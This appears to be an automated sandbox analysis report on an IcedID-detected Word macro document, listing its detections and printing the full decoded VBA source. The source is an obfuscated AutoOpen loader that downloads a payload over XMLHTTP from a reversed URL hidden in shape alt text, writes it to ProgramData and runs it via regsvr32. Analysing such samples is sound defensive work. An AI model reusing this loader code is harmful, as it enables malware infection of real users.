Verdict: MALICIOUS
Risk Score: 230
Heuristics: 6

- ClamAV: Doc.Macro.ICEID1020-9781212-0 (critical, CLAMAV_DETECTION): ClamAV detected this file as malware: Doc.Macro.ICEID1020-9781212-0
- VBA project inside OOXML (medium, OOXML_VBA, 3 related findings): Document contains a VBA project; VBA macros present
- CreateObject call (high, OLE_VBA_CREATEOBJ): CreateObject call. Matched line in script:
  Set ZaZny = CreateObject("Script" + AgsMH)
- VBA p-code auto-exec with execution tokens (high, OLE_VBA_PCODE_AUTOEXEC_EXEC): Triggers on the combination of two tokens co-occurring in the same compiled VBA/cache stream: an auto-execution entry point (Auto_Open / AutoOpen / Document_Open / Workbook_Open / Auto_Close / AutoClose) AND a shell/download/object-execution token (Shell, CreateObject, GetObject, PowerShell, cmd.exe, URLDownloadToFile, WinHttp, XMLHTTP, ADODB.Stream, ShellExecute, ExecuteExcel4Macro). Neither token alone fires it; it is the pairing that flags p-code-only or source-extraction-failure macro documents where the visible VBA source is unavailable. The matched tokens are named in the detail line below.
- AutoOpen macro (low, OLE_VBA_AUTOOPEN): AutoOpen macro. Matched line in script:
  Sub AutoOpen()
- Embedded URL (info, EMBEDDED_URL): One or more URLs were extracted from the document. The URL itself is not a detection; see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
  URL http://schemas.microsoft.com/office/word/2010/wordprocessingCanvas: in document text (OOXML body / shared strings)
Extracted artifacts (2)
Files carved from inside the sample during analysis.

| Filename | Kind | Source | Size |
|---|---|---|---|
| macros.bas | vba-macro | oletools.olevba.extract_macros (decoded VBA source from OOXML) | 11783 bytes |

SHA-256: 421c99eec8d5af69cc35afd4fae6d521855d557de5a8ef0ba034c491e3f047f4

Preview script (first 1,000 lines of the extracted script):
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Attribute VB_Name = "sgCej"
Sub zMYMk(fZvzC, Optional ByVal acHHl As String = "c:\programdata\GKLHy.txt", Optional ByVal AgsMH As String = "ing.FileSystemObject")
' Lures nasally helplessness
' Senoritas pencilled eavesdrop
' Drapes invitingly sinusoidal jerboas
' Impression allowing
' Nattering misrepresents commences
' Collapse cents
' Gossips prosecutable hakea
' Velour dutifulness consolations percussed
' Alarmism planting talker
' Subject satsumas goofing anticipation bonanza
' Thought clusters sturdiest peerless
' Jointed overpower joule bladders
' Unentered
' Hawaiian
' Bantered
' Shelf bitts leave matriarchies deepening
' Referent hardpressed
Set ZaZny = CreateObject("Script" + AgsMH)
' Soup cabby synthetics circadian
' Clearness crimped magmatic leniently
' Devalued economics sectioning apostasy
' Comestible unnervingly climbed
' Crosschecked frostier doted loaner sunrise
Set EdibZ = ZaZny.CreateTextFile(acHHl)
' Candelas
' Ladyship exotica overstates essen
' Overcoat decimation nasty
' Perplexedly rottenness historicist defining
' Divorce facilities fringy
EdibZ.WriteLine fZvzC
' Shuffling egret numskull seamstress crusher
' Interbreed
' Brisker feared
' Leadfree flack kinsmen
' Owners cavity lifeless
EdibZ.Close
' Chlorine copperplate perimeter snarl averred added flaunted
' Insomniacs possibly
' Setter pager quelled mechanistic belfry
' Escalate
' Garrison miner
' Brainlessness mended arcading
' Specialities
' Customise
' Lips discourteous seraphic unassailed
' Fragrances
' Negotiation neatens
' Aftercare permeated cloak powdery spike punitive
' Haemophiliacs allotted confederate colonial
' Defeater experience fatwa
' Extenuate stumpy absences indicating
' Amethystine pestilential condenser
' Extended
' Toothier tribunal furnished
' Oaks propane denoted retainer needs
' Interlocutors survivals granaries wary
' Goofs lenient
' Bags hover fleecy
' Surrealists garbling ebony strifes
' Shunning aliphatic
' Breezes disruptively part sac roulette
' Bonny flexion silhouetted accountancy airraid
' Appraises diminishes chairwomen votes
' Militates chambered manipulators hearsay womanise episcopacy
' Ballooning apportions undemocratic
' Temptations mobilises quailed
' Aqueous withers corroborate snoozing lactic
' Scalds
' Beholding loquacious
' Sweltering splattering percolate
' Totalitarian dote
' Withstood intersections trounces predisposed palatability
' Volunteer possession disassemble
' Custodial longitude
End Sub
' Sinusitis glittering discontented
' Trappings buccaneering disapprove
' Spars
' Steadygoing busybodies explore bard gunship consecrated
' Shudders contractually germinal
Sub AutoOpen()
' Six voice scoot spiced crofts
' Pork pyroxene
' Backwards pimply reciprocity
' Demilitarisation
' Jettisoning perseveringly
' Etui budded at
' Sixfold dissuaded likens
' Powerless provocations jilting
' Experimentalists
' Righthanded crispiest commissioners piteous renege
' Fusses curators channels
' Input impeachments retorting
' Pathos doorbells systolic
' Footprints blocky adaptability squirted
' Triviality grimacing teardrop
' Configured sportive genteel annoyers tremendously
' Assassination abstain pipeline
' Collisional outface
' Leakage photocopying
' Interoperability sunflower
' Ensemble sided
' Lab scoring shortages curses
' Hungriest superlatives
' Nestegg streetwise gumshoe
' Oedema suits
' Kingsized pertinent unprivileged
' Acidrain halting checklists magnolia silt
Dim GdSiS As New FMZUk
' Chancing repeats dysfunctional
' Paradoxical counterbalance humouring baggier salvages
' Exacerbating beaked busker
' Environmentalist
' Bacterium spiked regally ablates
' Crypts
' Abdominal tankard supercomputer dryness overpayment
fZvzC = GdSiS.VhfkK("MSXML2.serverXMLHTTP")
' Nonexistent
' Pathologies pooch
' Undernourishment gobbling drool
' Friskiest stockade
' Cervix isolated enumerable
' Strolls velodrome secretary
' Groundswell cornea emulator
zMYMk YXqlK(fZvzC)
' Lecher pupated
' Mannerism flavours laden
' Astronomer bearable verdure
' Typically comas groper
' Shortsightedness rifting
' Exhaustively grudgingly
' Bloodsports throwing afforestation wrestling
' Stole castaway lamina
' Disease chicanery tincture
' Graphical striver daunts
' Volts herb secessions whine
' Tubular decorator dismaying cortege
vxDJF kBNex(0) + "vr32 c:\programdata\GKLHy.txt", "ws"
End Sub
Function wijDG(tAPgr, ohCyp)
' Explains snits
' Three coda
' Slip
' Amours monthlies uncalibrated
wijDG = Split(tAPgr, ohCyp)
End Function
Attribute VB_Name = "wMBfi"
' Quartic clubroom smokeless clouding pureness renowned
' Insularity indexer richer
' Bevels steadfast
' Blasted exudate undergrounds postmen livelier overcapacity
' Sociable
' Comber resourceful
Function YXqlK(RpYMV)
' Soots
' Stablemate brotherhood
' Sleeplessness disinterested
' Walruses fulfil joked
YXqlK = StrConv(RpYMV, vbUnicode)
' Franc
' Churlishness absentmindedly mileposts nimbleness farmsteads unlicensed interrogatives
' Granular dawned complainingly
' Underskirt feminism
' Burgeoning san
End Function
' Exterminate loony infringes teenager
' Hoarser twinge really reformations
' Rainwater vestige casualty masseuses handy blackmailing hones tights
' Tropopause godsend scratchy
' Maturity centrifuges crumples
' Stopwatch vegetate drizzle burners breadwinner
Function JmLHe()
' Dublin sherries typifies uncreased
' Magneto antifreeze chandler hooray interesting
' Revitalise freezer homecoming authenticates
' Televised
' Episode axiomatic ballad
' Hymnal tuesday unorthodox cajole warmness
' Amalgams overspill oversensitivity ergodic argued
' Incurred extractions preserving appendix catchphrases
' Immunities seem
' Palaeontologist entail corroborates
With ActiveDocument.shapes(1)
JmLHe = .AlternativeText
End With
End Function
' Loves elongate expectancies
' Archaeology collectables speckled
' Canadian pesticide emotionally unclouded talented mysteriously hermetic
' Modality dismantling
' Muffler parlour kebabs similitude sinews
' Dimmest loads
Function kBNex(ccvfP)
' Splittings decay gyrating morphisms
' Fixation ringlets
' Deliberative solidarity juvenile flood
' Prince corrodes sating gratify
' Politically correctors
' Standardisation subroutine secateurs pulverised
' Chow helterskelter
' Pitted occupants earaches colonnade
' Telephony headmistress bladed cabbages moles
' Vulcanised dassie hexameter dahlia
' Nationalisation racketeering pedagogically roadway gagged
' Nullity refutable aupairs
FXSKU = JmLHe()
GufpG = wijDG(FXSKU, "###")
iUVCk = GufpG(ccvfP)
kBNex = iUVCk
End Function
Attribute VB_Name = "FMZUk"
Attribute VB_Base = "0{FCFB3D2A-A0FA-1068-A738-08002B3371B5}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = False
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False
Function Reverse(Text)
Dim i As Integer
Dim StrNew As String
Dim strOld As String
strOld = Trim(Text)
For i = 1 To Len(strOld)
StrNew = Mid(strOld, i, 1) & StrNew
Next i
Reverse = StrNew
End Function
' Froze governesses
' Ford crochets
' Hear
' Soldered conkers coquettish impracticability
Function VhfkK(bzaia)
' Sensation penknife
' Unbeliever gluttony motherofpearl syrups
' Protest
' Madrigals khaki soot import
' Blamelessly paining
' Subsoil sturdily legumes fidgety ascertains foramen tradings
Dim Ywxvu As Object
' Waistband
' Van polymers
' Iconographic splashy modernists
' Peculiar
' Computes lamed registers
' Unmemorable dankest deviate phonon
' Copulations crossbow healthiest forged clones churchman
' Fingerless interrupting
' Unobtrusive amputees profiteering submarines putt
' Guide angola mastering dismal tactile
' Screenwriter
' Relentless weddings prolongation nomad instigating
Set Ywxvu = CreateObject(bzaia)
' Tinge nylons
' Parametrisation tippling bleakness tumbled
' Earthbound shindig
' Devilled delaying gamy roundel
' Loser clone tolerating
' Dispensation quasar businesswoman
' Luxuriously juniper
' Receptor inundate boneless startups prejudicial
' Mostly guffaws responsibly notes eel
' Blameworthy wallflower reissued judiciously
' Foreseeing farmhouse
' Bogged gravitas propagate crimes
' Forgiven
' Fatherly innovating yaws petitions
' Rage goodlooking pecking
' Headlines testers
' Subclasses charlie
' Saving eg anchorite compatibility martens
' Ministering stashes wriggling
' Forceful
' Ladle emblematic gynaecology
' Presenting lovingly neuronal decorum
' Drugs deranged
' Unbroken iterating drown scotfree
' Proportional hail vulgarly
' Ripened undying
' Enviable fugitives tens prunings sagely
LJSGF = kBNex(1)
' Invasions reconsult hegemonic replier formic priories dispatcher
' Molar inconsiderateness bonbon
' Romping halfway herds normed digressed swung gals
' Pasty situate
Ywxvu.Open "GET", Reverse(LJSGF), False
' Absolved overnight
' Thinkable
' Librettists writings wafture boracic
' Ghastliest
Ywxvu.Send
' Culturally drools kedgeree sequin gamete
' Curtilage stammering parenthetical ablation
' Fewest saps
' Trap curd
' Endued mushroomed densitometry
' Awaits memorials deteriorates resea epistles
VhfkK = Ywxvu.responsebody
End Function
Attribute VB_Name = "HGhgQ"
Sub vxDJF(RHhQj, vToxs)
' Otherness gooey cellulite
' Cannoned indirection
' Disintegration attesting ruptures
' Romanticises wenches
' Decoupled expertly alluvia hexagon scowls dew
' Gallivanted liberals
Set rCNyB = CreateObject(vToxs + "cript.shell")
' Mostly prawns masks contemporaneity peddlers integrative
' Dubbed increase fishmonger
' Skyward rash
' Melancholic scarred girder ancestor troopship
' Magniloquent
' Veritable deceitfulness
' Illegibly strenuously exemplify
' Obscurely missile promised encircling
' Suckle impatiently beans
' Haulers familiarise
' Configurable hibernal
' Alcove diphtheria hoarsely
' Glimpses
' Punitive immovable depositions
' Disarrayed polity electrocardiographic answering sixteen enrichments
' Rakish stink rep quiveringly slowness
' Helpful martyr interdict
' Hoover frustratedly mappable
' Iceage calcify smilingly
' Needling onuses gawpin elbow
' Ranters mapper
' Phrenological limit kinematics sickens reporters
' Proletarians apogee rafting
' Lifesaving exponentiation
' Lawless interrelated
' Obnoxiously enhances
' Neuroscientists prompt
' Enraged stitches hart
' Ascetic participle drapers hiring dictator
' Interoperable driest sedater disheartened
' Stacking pilgrims sandbanks
' Heathen powersharing maseru encroaches circumscribing
' Corroboration apache kinetic
' Courtesan perverts grazing weathers retaliate
' Fastness licensing
' Admittance wheedled femininity constitutions
' Internal clued disguised
' Mist attired
' Cyprian invulnerability arrowed
' Authorised
' Pharmaceuticals uprightly cahoots wanton launches
' Sternum cultivates crimes incidents abstentions dirtiest
' Uncovers hones inefficiency tolerate
' Intensification truncate perverts
' Boohoo webs enemy multilayer
rCNyB.exec RHhQj
' Boastfulness strongmen inelegant
' Residues aspect mitigate shorted animation perversely lookalikes
' Parakeets
' Poverty spacial edges
' Impressionistic shipwrecked waiver
End Sub

| Filename | Kind | Source | Size |
|---|---|---|---|
| vbaProject_00.bin | vba-project | OOXML VBA project: word/vbaProject.bin | 44544 bytes |

SHA-256: 65d998971008c5350aae82543eb567f2df5bd280eb98ed36a9fd7898ff0717e9

Detection:
ClamAV: Doc.Macro.ICEID1020-9781212-0
Obfuscation or payload: unlikely